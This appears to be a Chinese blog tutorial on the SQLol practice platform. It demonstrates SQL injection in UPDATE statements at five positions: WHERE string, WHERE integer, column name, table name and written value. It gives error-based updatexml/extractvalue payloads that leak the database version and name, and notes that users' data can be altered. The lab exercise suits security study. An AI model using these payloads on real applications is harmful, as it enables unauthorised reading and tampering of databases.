SQL注入测试平台 SQLol -4.UPDATE注入测试

本文详细介绍了SQL注入攻击的原理及利用方法,包括在不同位置(where clause, integer in where clause, column name, table name, value to write)进行注入的步骤与实践案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试。

update语法:

 UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】 

接收的参数可能拼接到上述语句中【】的任一个位置,4个位置,共有5种不同的类型。下面开始演示: 

 

一、String in WHERE clause

构造POC:

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'

如下图,获取数据库版本  

二、Integer in WHERE Clause

构造POC:

1 or extractvalue(1,concat(0x7e,database())) or''

如下图,获取数据库版本

三、Column Name

注入点在【1】处,

UPDATE users SET 【1】 = 'haxotron9000' WHERE isadmin = 0 

能想到的利用方式有两种:

1、注释掉后面的语句,自由构造报错语句进行执行

2、更改users表中的用户数据

POC:

UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))

  

四、Table Name

注入点在【1】处

 UPDATE 【1】 SET username = 'haxotron9000' WHERE isadmin = 0 

我们如何来利用呢?

1、表名可以自己控制,在知道某表某列的情况下,就可以自由更改数据啦。

2、构造报错注入,与上一个类似。

 

五、Value to write

注入点在【1】处

UPDATE users SET username =【 '1'】 WHERE isadmin = 0 

构造POC:

UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#

 

似乎没什么新意,也就这几种方法在切换,以后想到别的方法再来更新吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值